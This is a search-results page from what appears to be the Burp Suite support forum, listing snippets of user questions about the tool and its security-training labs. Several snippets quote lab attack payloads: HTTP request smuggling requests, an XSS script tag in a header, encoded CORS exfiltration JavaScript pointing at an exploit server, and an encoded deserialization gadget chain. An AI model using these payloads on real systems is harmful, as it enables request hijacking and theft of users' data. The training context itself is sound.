provided is: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Dec 08, 2022 07:47AM UTC | 6 Agent replies | 6 Community replies | How do I?

Filter by search terms broken when using nonascii characters

Hi, We live in Romania and when working in our native language we are also using non-ASCII characters: ăîâșț. I noticed that if I use these in a website proxied through Burp the filter does not find this characters....

Last updated: Oct 02, 2023 10:23AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Identify the template engine in the "Server-side template injection using documentation"-Lab

provoking a syntax/undefined variable error, because the error message gives a hint to the used template engine

Last updated: Jun 06, 2021 10:54AM UTC | 5 Agent replies | 3 Community replies | How do I?

Bug in Lab

error Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4

Last updated: May 25, 2021 01:32PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

HTTP request

POST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 01, 2023 07:18AM UTC | 1 Agent replies | 0 Community replies | How do I?

How do I Import Binary Search Code into BurpSuite? The Elegant Solution(Binary Search) of -> Lab: Blind SQL injection with conditional responses

lab-conditional-responses There is a note on this lab about a more elegant solution, which is to perform binary search I did this manually( in my head), but is it possible to import the binary search code into BurpSuite

Last updated: Jun 10, 2020 02:49PM UTC | 1 Agent replies | 0 Community replies | How do I?

Burp Intruder inaccurate received and completed response time

I think setting the "Number of threads" to 1 in "Intruder >> Options >> Request Engine" section may solve

Last updated: Jun 02, 2022 09:30AM UTC | 2 Agent replies | 2 Community replies | Bug Reports

Is that possible to create a Docker image of Burp Pro?

home directory as a volume and include your Burp license in the file: - https://docs.docker.com/engine /reference/builder/#volume - https://docs.docker.com/engine/tutorials/dockervolumes/ You can load

Last updated: Feb 14, 2022 01:10PM UTC | 9 Agent replies | 12 Community replies | How do I?

Status "Errors: Unknown"

During our first scan, the crawl phase finishes with 6000+ requests and 67 locations scanned.

Last updated: Oct 07, 2019 07:48AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: HTTP request smuggling, basic TE.CL vulnerability

Please see below: POST / HTTP/1.1 Host: <lab-ID>.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: 0a4200c60375b196c058f06300d100b9.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: 0a55001804a184ac82e056fd001300f2.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Aug 07, 2024 06:52AM UTC | 8 Agent replies | 13 Community replies | How do I?

Lab Not Working Properly

HTTP/1.1 Host: ac821ff91fa6a6ac80911ed1005d00ec.web-security-academy.net Content-Type: application/x-www-form-urlencoded 1.1 Host: aca71f681fe0a61c80c01e0d01930066.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net Content-Type: application/x-www-form-urlencoded Host: exploit-ace11f511e3acff980030cc4010500fe.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: ac7a1f911ef7995e80d3ec5300020083.web-security-academy.net Content-Type: application/x-www-form-urlencoded Host: exploit-acab1f4f1e8899f38092ec9101ef005c.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net Content-Type: application/x-www-form-urlencoded Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Sep 22, 2024 11:33PM UTC | 5 Agent replies | 12 Community replies | How do I?

Exploiting HTTP request smuggling to perform web cache poisoning - Not getting results.

HTTP/1.1 Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net Content-Type: application/x-www-form-urlencoded Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Oct 18, 2021 08:49AM UTC | 0 Agent replies | 1 Community replies | How do I?

Lab: Arbitrary object injection in PHP

burp request ..Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:5 Stack trace: #0 {main} thrown in /var/www/index.php on line 5

Last updated: Apr 12, 2021 09:19AM UTC | 1 Agent replies | 0 Community replies | How do I?

Missing parameter in HTTP Smuggling request lab

HTTP/1.1 Host: 0a3a008503e2d7a7c03e1b91006c0030.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 256 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: 0abd00da04a3b710c0c4a56b002200b3.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 256 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Jun 29, 2022 02:33PM UTC | 2 Agent replies | 1 Community replies | How do I?

Lab Not Responding

HTTP/1.1 Host: ac6d1fc91e74b3a4808926fc009c005a.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Feb 03, 2022 09:11AM UTC | 7 Agent replies | 8 Community replies | How do I?

Lab: Exploiting HTTP request smuggling to capture other users' requests

the lab POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 256 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Apr 19, 2021 10:55AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: Exploiting HTTP request smuggling to capture other users' requests-- not solving

HTTP/1.1 Host: ac4f1f451ed62abd80777fe600120062.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 277 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 04, 2021 08:08AM UTC | 1 Agent replies | 0 Community replies | How do I?

HTTP request smuggling, obfuscating the TE header

response when i sent this request POST / HTTP/1.1 Host: my lab id Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Nov 18, 2020 11:51AM UTC | 1 Agent replies | 0 Community replies | How do I?

Sort entries in the site map by domain components before hostname

com.host1.www com.host1.www1 com.net2.www even though the hostnames are actually displayed as expected

Last updated: Apr 24, 2024 08:00AM UTC | 4 Agent replies | 3 Community replies | Feature Requests

Allow to search for support/forum issue using keyword

In the past I used to search on support related issues on https://portswigger.net/support or https:/ Apparently today - I don't find the search text box. Can this (search) functionality added again? Thanks, Vinay

Last updated: Feb 18, 2020 09:22AM UTC | 1 Agent replies | 0 Community replies | Feature Requests

HTTP request smuggling, basic TE.CL vulnerability Lab Queries.

AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36 Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Connection: keep-alive 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Jun 12, 2023 12:58PM UTC | 1 Agent replies | 0 Community replies | How do I?

Exploiting HTTP request smuggling to capture other users' requests

acc91f4d1faf6485c0b70322000b009b.web-security-academy.net Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU Content-Type: application/x-www-form-urlencoded Transfer-encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Length: 600 Content-Type: application/x-www-form-urlencoded

Last updated: Dec 19, 2022 04:36PM UTC | 7 Agent replies | 8 Community replies | How do I?

Java Error Occured during Pentesting on .jsp webpage

In Scanner > Options > Active Scanning Engine. There is a similar setting in Spider > Options > Spider Engine.

Last updated: May 31, 2018 08:02AM UTC | 2 Agent replies | 1 Community replies | How do I?

Different URLs in Target: Request, Raw and Site map URL

Here is what is shown in the Site map window right above (list of all URLs): https://www. id=WEB87431-20150616190 HTTP/1.1 Same with: https://www._something_ com/ - GET - /bp_chart.php?

Last updated: Jun 19, 2015 08:08AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

invisible proxy

Technical_notes/Add_a_second_IP_address_to_an_existing_network_adapter_on_Windows and "Linux":https://www

Last updated: Jun 05, 2019 04:40PM UTC | 3 Agent replies | 2 Community replies | How do I?

LAB: Exploiting HTTP request smuggling to perform web cache poisoning

I'll past the request: POST / HTTP/1.1 Host: victimhost Content-Type: application/x-www-form-urlencoded postId=1 HTTP/1.1 Host: exploitserver Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Dec 23, 2021 12:43AM UTC | 4 Agent replies | 5 Community replies | How do I?

Turbo Intruder - race-single-packet-attack.py Not queueing requests

Also, Tried this on http2 server using Engine.BURP2 but I'm getting: AttributeError: class Engine

Last updated: Oct 30, 2023 09:09AM UTC | 1 Agent replies | 1 Community replies | Burp Extensions

Lab Issues: Exploiting HTTP request smuggling to deliver reflected XSS

Exploit: ``` POST / HTTP/1.1 Host: my-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded postId=5 HTTP/1.1 User-Agent: a"/><script>alert(1)</script> Content-Type: application/x-www-form-urlencoded

Last updated: Jan 27, 2022 12:17PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Request Smuggling - Lab does not work

0a5900b7040dfb4fc1db8f1c005d0093.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded

HTTP/2 Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net Content-Type: application/x-www-form-urlencoded HTTP/2 Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Apr 24, 2023 06:51AM UTC | 4 Agent replies | 4 Community replies | How do I?

Run Intruder attack in silent mode

You could also try to configure the settings within Intruder -> Options -> Request Engine. you can alter: https://portswigger.net/burp/documentation/desktop/tools/intruder/options#request-engine

Last updated: Oct 14, 2019 08:07AM UTC | 2 Agent replies | 1 Community replies | How do I?

Training Burp's crawler

Ensure the task execution engine isn't paused.

Last updated: Feb 07, 2019 01:02PM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: 2FA bypass using a brute-force attack

this is my turbo code : def queueRequests(target, wordlists): engine = RequestEngine(endpoint =target.endpoint, concurrentConnections=5, engine

Last updated: Mar 18, 2024 01:08PM UTC | 16 Agent replies | 33 Community replies | How do I?

Parameter payloads that are required to launch a scan using burp API

Hey Uthman, Thanks for connecting, so we are implementing a local orchestration engine which will

Last updated: Oct 12, 2020 08:50AM UTC | 3 Agent replies | 3 Community replies | How do I?

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

HTTP/1.1 Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 60 POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters) Content-Type: application/x-www-form-urlencoded

Last updated: Aug 17, 2022 02:49PM UTC | 2 Agent replies | 4 Community replies | Burp Extensions

Lab - Modifying serialized objects login fuction not working properly?

PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www :/usr/share/php') in /var/www/index.php on line 1 And I am unable to log in, therefore no request https://0ad70019033a57a1c05c334c004d0082.web-security-academy.net/login Content-Type: application/x-www-form-urlencoded is-warning>PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www :/usr/share/php&apos;) in /var/www/index.php on line 1</p> </div> </section

Last updated: Oct 24, 2022 03:46PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Scanning abandoned due to too many errors

You can do this via Scanner > Options > Active Scanning Engine.

Last updated: Jul 31, 2018 07:45AM UTC | 3 Agent replies | 2 Community replies | How do I?

use burp suite

https://www.?elp.com

Last updated: Sep 21, 2017 09:39PM UTC | 0 Agent replies | 0 Community replies | How do I?

Possible bug in concrete class of IScanQueueItem

Unfortunately, I do not control the reflection query since it is managed by the JFX web engine.

Last updated: May 18, 2015 04:43PM UTC | 3 Agent replies | 6 Community replies | Bug Reports

Burp 2.x Audit finds less issues

Hi, the scanning engine has changed completely from version 1 -> 2, we navigate through the application

Last updated: Oct 07, 2019 02:11PM UTC | 2 Agent replies | 0 Community replies | Bug Reports

Burp scanner ignores scan configuration exclusion lists

/my_profile;jsessionid=560423289919l0e2g6f88f71qjg4xp1z2uwc408389.5604232899 HTTP/1.1 Host: www..... Connection: close Content-Length: 3002 X-Single-Page-Navigation: true Origin: https://www.....

Last updated: Apr 08, 2020 12:24PM UTC | 3 Agent replies | 2 Community replies | Bug Reports

An incorrect example in the "Exploiting HTTP request smuggling" section on the Web Security Academy.

Transfer-Encoding: chunked 0 POST /login HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded supposed to be: 0 POST /login HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Jul 21, 2023 07:21AM UTC | 2 Agent replies | 1 Community replies | Bug Reports

How do I troubleshoot "failed to connect" messages?

before retry" when a network error occurs: http://portswigger.net/burp/help/spider_options.html#engine http://portswigger.net/burp/help/scanner_options.html#engine

Last updated: Feb 23, 2015 10:29AM UTC | 1 Agent replies | 0 Community replies | How do I?

XSS vulnerabilites

From your response, Can you please confirm if scanning engine is intelligent enough to modify its requests

Last updated: Aug 19, 2016 09:18AM UTC | 7 Agent replies | 8 Community replies | How do I?

Embedded browser fails to start from docker container

https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities --cap-add=SYS_ADMIN

Last updated: Dec 11, 2020 11:39AM UTC | 7 Agent replies | 6 Community replies | Bug Reports

IIS 7.5 crashes when actively scanning website

Dafydd, are you talking about number of threads in the Active Scanning Engine area should I use Throttle

Yes, you can reduce the thread count in the active scanning engine options, as the first fix.

upgrade since I was waiting on the upgrade I want to try the scanner options In the Active Scanning Engine

Last updated: Oct 15, 2019 07:05PM UTC | 5 Agent replies | 9 Community replies | How do I?

Burp Search Function does not show original and edited Request

When using Burp's search functionality, the results only contain a request and response pair for each

Last updated: Jan 15, 2020 03:50PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Broken chunked-encoding

like Gecko) Chrome/88.0.4324.150 Safari/537.36 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded keep-alive 96 GET /404 HTTP/1.1 X: x=1&q=smugging&x= Host: example.com Content-Type: application/x-www-form-urlencoded

Last updated: Apr 22, 2021 09:58AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

In proxy history, view both request and response in the same tab

did we got response search feature ? are we get it ever?

Last updated: Oct 25, 2021 01:35PM UTC | 7 Agent replies | 37 Community replies | Feature Requests

Possible bug: Missing hosts in site map in branch 2.x

It may be that task execution engine was paused. You will see a warning in the Dashboard tab if so.

Hi Liam, My burp was still open and task execution engine was indeed paused!

Last updated: Jan 15, 2019 01:39PM UTC | 2 Agent replies | 2 Community replies | Bug Reports

Solution not functional: "Lab: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses"

HTTP/1.1 Host: 0a4c00f10450f67f802cd1480095009f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Sep 17, 2024 11:20AM UTC | 1 Agent replies | 1 Community replies | Bug Reports

HTTP Request Smuggler doesn't work

HTTP Request Smuggler is not working properly, when I start Attack, it does not proceed from "ENGINE

Hi Frame Are you seeing the same problem with the attack not proceeding from 'Engine warming up'?

Hello, I don't see any errors related to 'Engine warming up'.

Last updated: Jun 10, 2024 06:47AM UTC | 6 Agent replies | 8 Community replies | Burp Extensions

Random timing for intruder

You can configure this at Intruder > Options > Request Engine > Throttle > Variable.

Last updated: Sep 28, 2017 03:51PM UTC | 2 Agent replies | 1 Community replies | Feature Requests

Turbo Intruder ( Import error of a python library - requests module )

you know you can use callbacks.makeHttpRequest to issue requests outside of the configured request engine

Last updated: Sep 09, 2024 06:33AM UTC | 4 Agent replies | 6 Community replies | Burp Extensions

Lab: HTTP request smuggling, basic TE.CL vulnerability

document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0

postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0 postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0

Last updated: Sep 26, 2024 05:26PM UTC | 2 Agent replies | 1 Community replies | How do I?

Resource Pools

scroll down to the bottom, there's the option to adjust the number of threads in use by the Discovery Engine

Last updated: Dec 19, 2022 04:08PM UTC | 1 Agent replies | 1 Community replies | How do I?

Burp 2 active scanner paused

We're working on a few bug fixes in the Task Execution Engine, which manages scans.

Last updated: Mar 14, 2019 02:16PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

How lookup for specific list of parameter in search functionality in burpsuit.

Hi Team, I did find is this feature available or not? If suppose, I have list of parameters if I want to use that list in order to look for parameter or existence in burp history. is that possible? I will just load...

Last updated: Sep 30, 2022 09:48AM UTC | 3 Agent replies | 2 Community replies | How do I?

Burp Enterprise vs Burp pro

Does Burp pro use a newer engine than Burp Enterprise? Fabio

Last updated: Mar 12, 2020 06:52PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Cannot set spider link depth to zero.

The underlying engine is working correctly. We'll get this fixed shortly.

Last updated: Jan 27, 2016 11:01AM UTC | 3 Agent replies | 0 Community replies | How do I?

Lab: CORS vulnerability with trusted insecure protocols - exploit works in my browser (Chrome) but not when deliver to vitim

71%2e%6f%6e%6c%6f%61%64%20%3d%20%72%65%71%4c%69%73%74%65%6e%65%72%3b%20%72%65%71%2e%6f%70%65%6e%28%27%67% 64%38%36%33%30%31%65%36%30%30%31%35%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%6c%6f%67%

Last updated: Aug 08, 2024 06:43AM UTC | 9 Agent replies | 7 Community replies | How do I?

Burpsuite Enterprise: Crawling and scoping

Burp Pro and Enterprise use the same crawl and scan engine.

between Burp Pro and Enterprise is because Burp 1's spider function works differently to the crawl engine

Last updated: Mar 26, 2019 02:10PM UTC | 2 Agent replies | 2 Community replies | How do I?

Turbo Intruder: always updating Content-Length header

Here is my script: def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint pipeline=True, maxRetriesPerRequest=0, engine

Last updated: Mar 20, 2020 10:20AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: Exploiting HTTP request smuggling to capture other users' requests

HTTP/1.1 Host: ac4f1f861e1580afc0ad62b3000a0048.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Content-Length: 251 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 26, 2022 12:16PM UTC | 1 Agent replies | 0 Community replies | How do I?

Burp Enterprise Questions

Since pro and enterprise version using same scan engine, May I know the additional benefit or feature

Last updated: Oct 14, 2019 08:03AM UTC | 3 Agent replies | 2 Community replies | How do I?

Burp stops accepting keyboard input in repeater request window

java.runtime.name OpenJDK Runtime Environment java.runtime.version 16.0.2+7-67 16 java.vm.vendor Oracle Corporation java.vm.version 16.0.2+7-67

Last updated: Jan 21, 2022 04:18PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Mystery Challenge

The lab randomization engine is not working properly.

Last updated: Jun 27, 2022 09:56AM UTC | 2 Agent replies | 1 Community replies | Bug Reports

Difference in burpsuite dastardly and pro light scan results

My question is if dastardly uses the same lightweight engine as burpsuite then how the results are different

Last updated: Feb 16, 2023 05:23PM UTC | 1 Agent replies | 1 Community replies | How do I?

Delay Intruder attack

This was removed when we carried out some work on Intruder to move it over to using the standard Task Engine

Last updated: Mar 17, 2023 02:01PM UTC | 1 Agent replies | 0 Community replies | How do I?

How do i disable default scanner?

The default scanner engine sends a lot of requests, can i disable it and only use my scanner extension

Last updated: Apr 30, 2018 07:11AM UTC | 1 Agent replies | 1 Community replies | How do I?

Burp Infiltrator JCR injection

69) at org.apache.jackrabbit.core.query.CompoundQueryFactory.createQuery(CompoundQueryFactory.java:67

Last updated: May 18, 2017 02:33PM UTC | 1 Agent replies | 0 Community replies | Feature Requests

Crawler throttle options

Hello, The old spider engine has throttle between requests options but I cannot find them with the

Last updated: Oct 01, 2018 07:23AM UTC | 1 Agent replies | 0 Community replies | How do I?

Changing color of filter "button" in Proxy/HTTP History when using "Search Term"

changing the color of the "Filter" button within the Proxy/HTTP window, or elsewhere also, when a "Search

Last updated: May 18, 2023 10:33AM UTC | 1 Agent replies | 0 Community replies | Feature Requests

Issue with "Reflected XSS protected by very strict CSP, with dangling markup attack" Lab

Is the victim user configured to search and click on anchor tags only?

Last updated: Dec 28, 2023 07:59AM UTC | 2 Agent replies | 2 Community replies | How do I?

Burp Enterprise - Scan Multi Step Login to Application

Burp Enterprise uses the same Crawling and Scanning engine. Unfortunately, we can't provide an ETA.

Last updated: Feb 22, 2021 01:52PM UTC | 7 Agent replies | 6 Community replies | How do I?

Incorrect Issue Type/Advisory Finding & Remediation

As such, it is recommended to set the header as X-XSS-Protection: 0" Reference https://owasp.org/www-project-secure-headers

Last updated: Jul 28, 2021 08:43AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Add HTTP Method as a value to the filter scope

Btw, I had a look at how your extension works: you tricked the engine into believing it's a response

Last updated: Aug 29, 2023 05:03PM UTC | 7 Agent replies | 7 Community replies | Feature Requests

turbo intruder

Hi Could you clarify which engine you are using with Turbo Intruder?

Last updated: Jun 25, 2024 03:48PM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

Accuracy of Scan between Professional and Enterprise

The scan engine is the same in both Enterprise and Professional.

Last updated: Aug 11, 2022 10:12AM UTC | 2 Agent replies | 1 Community replies | How do I?

more flexible scanning

We do have a work plan for a more advanced execution engine, which will feature what you mentioned and

Last updated: Sep 07, 2017 12:37PM UTC | 1 Agent replies | 0 Community replies | Feature Requests

Hybrid environment

Where the console is installed on-prem but wants a scan engine installed in Azure AD.

Last updated: May 03, 2021 01:40PM UTC | 1 Agent replies | 0 Community replies | How do I?

Burp Collaborator question

Now we all know that the active engine scanner issues payloads containing Burp collaborator's hosts. vulnerability by not being able to keep all interactions generated by the collaborator in the active scan engine

Last updated: Oct 03, 2018 04:58PM UTC | 2 Agent replies | 3 Community replies | How do I?

Projects randomly stop collecting target information.

Additionally, I've sent you an email displaying the task execution engine paused message.

Last updated: Nov 09, 2018 04:00PM UTC | 3 Agent replies | 4 Community replies | Bug Reports

How can i send two same request parallelly at the exact same milisecond?

What settings have you set for the Request Engine in Intruder?

Last updated: Feb 24, 2021 11:32AM UTC | 2 Agent replies | 1 Community replies | How do I?

Proxy connection closed

7f2f9e055a74df967116223c431c9ffc=qub7j1cc8bi084gvtd3p2b1q84 Connection: close Content-Type: application/x-www-form-urlencoded

Last updated: Feb 17, 2018 08:26AM UTC | 3 Agent replies | 5 Community replies | Bug Reports

BCheck SQLi bypass autentication

: 33 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded : 33 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded

Last updated: Feb 29, 2024 01:50PM UTC | 2 Agent replies | 7 Community replies | Burp Extensions

Burp plugin that does not launch Burp GUI

specify this on the command line, for example: java -Djava.awt.headless=true -jar burp.jar Burp's engine

Last updated: Jun 02, 2015 01:17PM UTC | 1 Agent replies | 1 Community replies | Burp Extensions

Scan errors in Burp

retries Burp will perform and how long it will wait before retries at Scanner / Options / Active Scanning Engine

Last updated: Jul 09, 2024 01:32PM UTC | 4 Agent replies | 3 Community replies | How do I?

Where is the firefox "plug-n-hack" plugin?????

And, further, nothing works with Firefox 67, because it changes every URL to https

Last updated: May 29, 2019 05:58PM UTC | 3 Agent replies | 13 Community replies | How do I?

Ignore 302's in "Discover content" tool

needed, as I'm increasingly encountering sites where the current behaviour makes the content discovery engine

Last updated: Oct 11, 2019 01:05PM UTC | 6 Agent replies | 14 Community replies | Feature Requests

Schedule task

am trying to schedule an HTTP request using Engagement tools > Schedule task > Resume task execution engine

Last updated: Apr 27, 2021 11:21AM UTC | 1 Agent replies | 0 Community replies | How do I?

Using Burp Intruder threads option

Hi Dean, The Intruder has now been integrated with the Task Execution Engine so you will need to use

Last updated: May 17, 2021 02:40PM UTC | 2 Agent replies | 1 Community replies | How do I?

HTTP request Smuggling CL.TE LAB

HTTP/1.1 Host: 0a120052048d10f0c0b07c7700c300bb.web-security-academy.net Content-Type: application/x-www-form-urlencoded

solution : POST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Jan 18, 2023 10:45AM UTC | 2 Agent replies | 3 Community replies | How do I?

Lab: HTTP request smuggling, basic CL.TE vulnerability

HTTP/1.1 Host: 0a90006303d9bbc387c5700800820036.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: May 31, 2023 06:53AM UTC | 3 Agent replies | 2 Community replies | Bug Reports

Advanced Target Scope - Load File

.*\.example\.com\/* test\.net\/path\/here\/* www\.test\.net\/* -----------

Last updated: Mar 30, 2022 09:52AM UTC | 6 Agent replies | 7 Community replies | How do I?

Burp Collaborator WAF triggering/not obeying options

I had presumed that the collaborator was part of the core engine.

Last updated: Feb 12, 2018 10:02AM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Burp intruder

If Intruder was controlled by the Task Engine, so it would be included in the Project Options -> Scheduled

Last updated: Nov 24, 2020 01:56PM UTC | 1 Agent replies | 1 Community replies | How do I?

Exploiting Ruby deserialization using a documented gadget chain

57%5a%70%59%32%46%30%61%57%39%75%42%6a%6f%52%51%47%78%76%59%57%52%6c%5a%46%39%6d%63%6d%39%74%53%53%49%67% %32%4e%68%63%6d%78%76%63%79%39%74%62%33%4a%68%62%47%55%75%64%48%68%30%42%6a%6f%47%52%56%52%76%4f%77%67%

Last updated: Apr 19, 2022 05:39PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

Burp Scaner with form credentials

The Content-Type is: application/x-www-form-urlencoded

Last updated: Feb 25, 2020 02:53PM UTC | 4 Agent replies | 6 Community replies | How do I?

How do i can use SiteMap and Macros from Professional in Enterprise version

We are working on enhancements to Burp's crawl engine that will ensure that it deals with JavaScript-heavy

Last updated: Sep 14, 2022 07:43AM UTC | 5 Agent replies | 6 Community replies | How do I?

spider authentication error

This is in Spider > Options > Spider Engine.

Last updated: Jun 30, 2017 07:01AM UTC | 2 Agent replies | 1 Community replies | How do I?

The paging file is too small for this operation to complete

I have a dedicated scan engine and am only running 5 concurrent scans at a time.

Last updated: Aug 17, 2022 03:13PM UTC | 1 Agent replies | 1 Community replies | How do I?

Feature request regarding Burp's "Turbo Intruder" extension.

With this configuration: def queueRequests(target, wordlists): engine = RequestEngine(endpoint

Last updated: Jun 26, 2022 07:47PM UTC | 3 Agent replies | 4 Community replies | Feature Requests

Timing requests

Intruder attacks are registered as tasks so they are included when you pause or resume the Task Execution Engine

Last updated: Nov 23, 2020 04:17PM UTC | 4 Agent replies | 2 Community replies | Feature Requests

Can't install my certificates on http://burp

Search for browser.fixup.alternate.suffix. You can modify the .com default setting.

Last updated: Dec 12, 2019 01:27AM UTC | 17 Agent replies | 20 Community replies | How do I?

Filtering Intruder results using Regex

The search filter on Intruder results looks in the full response, headers and body.

Last updated: Feb 01, 2016 08:52AM UTC | 1 Agent replies | 0 Community replies | How do I?

Exploit Server

When I search vulnerability on www.example.com what should I use intead of "Portswigger>exploit-server

Last updated: Feb 20, 2021 04:36PM UTC | 3 Agent replies | 3 Community replies | How do I?

Old scanning workflow

My one request would be to have the option to have an old scanning engine view :) E.g List of URLs

Last updated: Apr 02, 2020 09:24AM UTC | 2 Agent replies | 1 Community replies | Feature Requests

Embeded Browser

Or is there a way to use Dom Intruder in another engine like Firefox or chrome. thank you

Last updated: Jul 04, 2022 09:50AM UTC | 1 Agent replies | 0 Community replies | How do I?

Good XSS detection

Please do have at least the level of accuracy as a regular nessus engine does when it comes to web testing

Last updated: Jun 01, 2015 08:39AM UTC | 1 Agent replies | 0 Community replies | Feature Requests

Corrupted Project

alias traversal, retire.js, software vulnerability scanner, software version reporter - the task engine

Last updated: May 06, 2022 07:58AM UTC | 9 Agent replies | 11 Community replies | Bug Reports

Turbo Intruder Headless Error

You will need to change your Engine type to one of the standalone non-Burp network stacks.

Last updated: Oct 10, 2024 10:46AM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

Section Symbols are appearing in images which breaks Intruder

literally anything, for example this random picture from google image search for "cats" https://images.pexels.com

